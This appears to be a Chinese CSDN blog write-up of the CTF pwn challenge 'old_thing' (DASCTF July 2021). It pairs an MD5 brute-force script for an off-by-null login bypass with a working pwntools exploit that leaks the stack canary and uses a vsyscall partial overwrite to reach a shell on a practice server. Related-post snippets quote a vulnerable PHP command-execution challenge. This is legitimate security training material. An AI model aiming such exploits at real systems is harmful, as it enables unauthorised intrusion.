2021DASCTF实战精英夏令营暨DASCTF July X CBCTF old_thing

最新推荐文章于 2024-08-25 12:49:51 发布
最新推荐文章于 2024-08-25 12:49:51 发布
阅读量449 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/119305422
版权

在这里插入图片描述RELRO半开。

在这里插入图片描述

进来以后首先需要登录。
用户名是admin,但密码不知道。
给了一个逆向,经过研究是md5.

为啥会是md5?
首先我们看一下md5是个啥算法。

首先要知道无论输入多长,输出的md5值一定是16字节。
还要知道md5有个叫标准幻数,也叫特征数的东西。
它是16字节,用16进制表示的话是0123456789abcdeffedcba9876543210.
一般我们的程序里面常见的是int类型数据,因为是小端序,一般我们在程序中看见的就会是
0x67452301 0xefcdab89 0x98bacdfe 0x10325476.

那么大概会进行一些什么操作呢。
首先会补位,补成512位的整数倍加448位,规则是先加一个1,剩下都是0.
这个补位一定会做,哪怕本身它就是512位的整数倍加448位。

然后再加上64字节的长度。最后变成一个512的整数倍。

512位是64个字节。
我们每一个64字节是一个小组,然后将每个小组的64字节拆开成16个四字节备用。
然后呢定义了四个函数,函数是固定的,他有七个输入。分别是四个幻术,一个四字节,两个常数。
然后分别对每个函数带入不同的4字节,分别计算,最后得到16字节的输出。

这个16字节的输出会被当成新的幻数,继续下一轮的512字节。
然后最后的输出16字节就是我们得到的md5的值。

然后呢对于这道题我们怎么做,我们首先会看到这个东西。
在这里插入图片描述那么看到这里已经基本上是九成确定是一个md5,但是不排除它可能会在md5外面进行一些嵌套。

它不会在md5里面进行一些乱七八糟算法的修改,那太傻逼了,成熟的算法不能乱动的。只能做嵌套。

我们验证他是不是的手段就是进行动调。输入一次,然后动调得到最终结果,跑到网站上试一下,最后的结果是发现一样的,所以我们确定这是一个md5.

回到这个题目,md5然后呢,我们是不可能得到这道题目的正解的,因为md5是不可逆的。
而且,你会发现我们md5得到的是16个字节,但是它的那个最后进行比较的值,显然要多得多,并不是16个字节。

正解就不大可能了。

问题出在这个地方。
在这里插入图片描述这里显然会有一个off by null。把啥变成了null,把s2,也就是我们最后密码md5出来的值第一个字节变成了null。
那我们如果想绕过这个strcmp,我们只要保证我们的输入经过md5之后,第一个字节是’\x00’就可以了。

那么咋整,我们只能去爆破。

import hashlib
import string
import itertools

target_c = '00'

for i in range(8):
        print(i)
        for mes in itertools.product(string.ascii_letters, repeat=i):
                if hashlib.md5((''.join(mes)).encode()).hexdigest().startswith(target_c):
                        print(''.join(mes))
                        exit()

他利用的是爆破可显示字符看哪个的md5第一位是00.
用了product函数。
在这里插入图片描述

爆破出来是gB。

在这里插入图片描述进来之后是两个功能,一个leak,一个overflow。

在这里插入图片描述因为开了canary,所以我们只要先把canary最后一个字节的’\x00’写掉,然后泄露一下就好了。

之后就是overflow一套带走。

要注意开了PIE,所以我们只能利用ret2vdso,在栈上找一个比较合适的地址,通过partail write,来getshell。

from pwn import*

context.log_level = "debug"

r = remote("node4.buuoj.cn", "26568")

r.sendafter("please input username: ", "admin")
r.sendafter("please input password: ", "gB" + '\x00' * 0x1e)

backdoor = 0x4007d6
vsyscall = 0xffffffffff600000

r.sendlineafter("3.exit\n", "2")
r.sendafter("your input:", "a" * 0x18 + 'b')
r.sendlineafter("3.exit\n", "1")
r.recvuntil('b')
canary = u64(r.recv(7).rjust(8,'\x00'))

r.sendlineafter("3.exit\n", "2")
payload = 'a' * 0x18 + p64(canary) + 'a' * 8 + p64(vsyscall) * 4 + '\x9f'
r.sendafter("your input:", payload)
r.sendlineafter("3.exit\n", "3")

r.interactive()
yongbaoii
关注
专栏目录
2021DASCTF实战精英夏令营DASCTF July X CBCTF 4th -- WP [pwn]
lifanxin的博客
08-03 1382
WP概述EasyHeaprealNoOutputold_thing总结 概述   前天又参加了一次激动人心的比赛,好吧,确实只能说是激动人心,毕竟没有物质回报,好的名次和中将名额总是和自己无缘。废话不多说,直接看wp。   所有题目和环境都在buuoj上有复现,这里感谢buuoj在我学习ctf过程中提供的做题环境以及时不时搞几场比赛来激励(打击/(ㄒoㄒ)/~~)我努力学习。 EasyHeap   题目是常规的堆题,64位程序,保护全开,漏洞也算明显,当然对strdup函数功能不熟悉的同学可能需要调试后才能
2021 DASCTF July X CBCTF 4th/web/cat flag
Demonering的博客
08-16 453
题目源码: <?php if (isset($_GET['cmd'])) { $cmd = $_GET['cmd']; if (!preg_match('/flag/i',$cmd)) { $cmd = escapeshellarg($cmd); system('cat ' . $cmd); } } else { highlight_file(__FILE__); } ?> 知识点: 1.绕过正则 2.escap
2021DASCTF实战精英夏令营DASCTF July X CBCTF Easyheap
yongbaoii的博客
08-30 252
保护是全开。 开了一块空间,这块空间权限都有。 但是下面开了沙箱,ban了execve。 add 正常申请空间,写大小。 但是有个问题,我们输入要申请的空间大小之后,使用了一个strdup函数。 这个函数会根据你的字符串自动申请空间,那么就意味着我可以写0x500的大小,但是只输了一个字节。 就会造成溢出。 delete 清空了。 show 正常输出。 edit 编写。 所以我们整个看下来,存在的问题就是有堆溢出。 那么我们利用这个溢出,首先申请释放一个大的chunk,挂进unsortedbin。 然后通
[DASCTF2024八月开学季!] Crypto
最新发布
Emmaaaaa's blog
08-25 1673
two_squares(n0),矩阵phi,维纳连分数,HNP,中间相遇
2021 DASCTF Sept X 浙江工业大学秋季挑战赛 pwn hahapwn
yongbaoii的博客
09-27 276
有个strdup要注意一下。 有溢出。 通过strdup泄露栈地址,栈上布置shellcode,跳过去就好啦 exp from pwn import* context.log_level='debug' context.arch='amd64' context.os = "linux" context.terminal = ["tmux", "splitw", "-h"] local = 1 if local: r = process('./1111111') else: r = re
2021DASCTF实战精英夏令营DASCTF July X CBCTF 4th-MISC-ezSteganography
ookami6497的博客
08-12 464
2021DASCTF实战精英夏令营DASCTF July X CBCTF 4th-MISC-ezSteganography 赛后复现一下 下载得到一张图片,说是flag就藏在里面 用StegSolve打开,使用方法可以参考这个Stegsolve使用方法还有这个 在Red0 找到提示信息,说有东西在G plane里面 在Green plane0看到了一点东西 比赛的时候以为就是这张图里面有东西,,,结果要提取bin文件出来。。。 只勾选g0,然后save bin 保存
2021DASCTF实战精英夏令营“签到”
weixin_48427966的博客
08-03 275
靶机地址: node4.buuoj.cn:28466 kali里面运行命令,出现第一行加密,将第一行加密复制,再次回车,出现try again。 然后再次输入以后,出现flag。
暑期夏令营活动宣传海报设计模板_AI&PSD素材下载.zip
12-28
这个名为"暑期夏令营活动宣传海报设计模板_AI&PSD素材下载.zip"的压缩包提供了一系列资源,帮助设计师快速高效地创建吸引人的夏令营活动宣传海报。 首先,让我们了解PSD文件格式。PSD是Adobe Photoshop的默认文件...
2021-2022收藏资料南阳市第五届中小学生网络夏令营竞赛答案.doc
09-26
2021年09月16日
西电2021夏令营.rar
07-27
【标题】"西电2021夏令营.rar"是一个压缩文件,通常包含西安电子科技大学(简称“西电”)在2021年举办的一次暑期活动的相关资料。这个压缩包可能包括了夏令营的介绍、课程大纲、讲义、作业、学员名单、日程安排、...
2021DASCTF Misc red_vs_blue
qq_51271165的博客
08-06 543
(第一次接触到需要nc连接的杂项题) 没有nc的需要先安装(Linux在终端输入apt install netcat) 安装完成后,直接nc xxxxxx xxxx 输入r/b猜测红蓝队的胜利,连续猜对66次就可以得到flag 如果错了就要重新猜(答案顺序不变),但是90秒后会自动断开连接,重新连接后答案顺序会改变,所以要人力无法完成的,要用脚本在90秒内跑出来,脚本如下: from pwn import * #需要用到pwntools模块 context.l...
DASCTF X CBCTF 2022九月挑战赛 reverse landing
weixin_63051469的博客
09-22 701
胡小楠的刷题日常
CTF大赛】2021 DASCTF July cybercms 一探再探
HBohan的博客
08-28 681
引言 在前不久结束的 2021 DASCTF July X CBCTF 4th 比赛中,有一道名为 cybercms 的 web 题目。 预期解是从后台登录处进行 SQL 注入写入一句话木马,然而咱在做题的时候尝试了另一种思路,用的是后台登录绕过 & 木马上传的打法。 由于比赛的时候半天打不通就十分难受,赛后还是想不明白就来稍微深入探究了一下,经过曲折最后终于成功打通了。 这篇就来记录一下做这道题时候的心路历程吧…… 题目初探 cybercms 赛博CMS,只为安全而生 Hint: 信息搜集是一个
DASCTF X BUU DASCTF2021 misc all WP
mumuzi的博客
05-29 3380
去******的猜******????****** MISC WP 签到: flag{welcome_to_dasctf_may} Holmes: 文件尾有rar,分离出来发现加了密,然鹅图片上面又有跳舞小人 对应解码,得到密码 YOUAREHOLMES 得到一个flag.py flag="flag{********************************}" encflag=[] for i in range(len(flag)): encflag.append((ord(fla
2021 MAR-DASCTF drinksometea
qq_37073764的博客
03-31 738
新手第一次见这种题,记录一下 压缩包给了一个exe还有一个png.out,那个png.out不知道干嘛用的。 查一下exe有无加壳,无,拖入ida进行分析。 程序流程不难,就是先从tea.png读入数据,然后经过中间的函数处理,然后把输出输出到tea.png.out。 题目要我们做的就是,用那个out文件,还原出png文件 进入4010A0函数,发现ida根本分析不了: 原来这就是传说中的花指令。 看了别的大佬博客才知道,对于00401116,有红色的这行语句按U,然后在Hex-view那里,把那行数据
2021DASCTF July X CBCTF--cat flag
qq_46263951的博客
08-02 452
很难受啊,比赛的时候根据提示猜到flag的文件名肯定在日志文件中,但不知道日志文件在哪里... 进去后直接给出一段php代码 <?php if (isset($_GET['cmd'])) { $cmd = $_GET['cmd']; if (!preg_match('/flag/i',$cmd)) { $cmd = escapeshellarg($cmd); system('cat ' . $cmd); } } else { .
2021DASCTF July X CBCTF 4th Nuclear wastewater学习记录
m0_49762339的博客
08-02 464
听完直播,这道题便豁然开朗 解压文件获得两个文件 其中flag.zip被加密,其密码应该是在这张二维码图片中, 扫描二维码,出现一个假的flag. “很容易”发现二维码的每个地方的颜色不一样,推测这些颜色隐藏了密码信息 如下列出脚本以及编写思路: #读入图片并获取二维码大小 from PIL import Image img=Image.open('Nuclear wastewater.png') x,y=img.size #获取每单位二维码的颜色的RGB值装入list,剔除白色 list=[] for
2020 CTF暑假夏令营培训Day1 安全杂项Misc
小哈里的博客
08-14 993
Day1安全杂项 WSL安装 程序和功能-启动windows功能-WSL win商店-ubuntu安装 file命令,查看文件格式 ubuntu账户:gwj12345,repeat Kali Linux账户:gwj12345,repeat 工具: 01编辑器(主要),Archpr(暴力开压缩包),AuDaCity(查看音频文件),JDK(JAVA运行环境),mp3SteGo(音频隐写),StegSolve(图片隐写),Wireshark(流量分析) 隐藏数据,文件拼接:copy /b 1.png+1.
2020 CTF暑假夏令营培训Day2 密码学Crypto 部分笔记
小哈里的博客
10-09 847
Day2密码学 - Crypto 架构 研究内容有:信息m的加密A、解密B、加密后的信息C(第三方是否可窃取)。 密码的分类:古典密码(关注算法的机密性,一般是置换和代换,打乱顺序,变量映射等),现代密码(假设算法大家都知道,关注信息本身的复杂度) 序列密码,核心为PRNG(伪随机数生成器)生成伪随机数序列,通过加密函数与明文加密生成密文,解密时生成一样的序列,用逆函数运算。 古典密码 历史:斯巴达密码棒,凯撒,维吉尼亚,希尔Hill,山农shannon,公钥ECC,DES,然后RSA,DSA,ECD
西电2021夏令营活动精华内容分享
资源摘要信息:"西电2021夏令营" 由于文件描述与标题相同,且标签为空,我们可以推测这是一个与西安电子科技大学(简称“西电”)2021年夏季举办的夏令营相关的压缩文件。在深入探讨之前,需要注意的是,由于缺乏...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值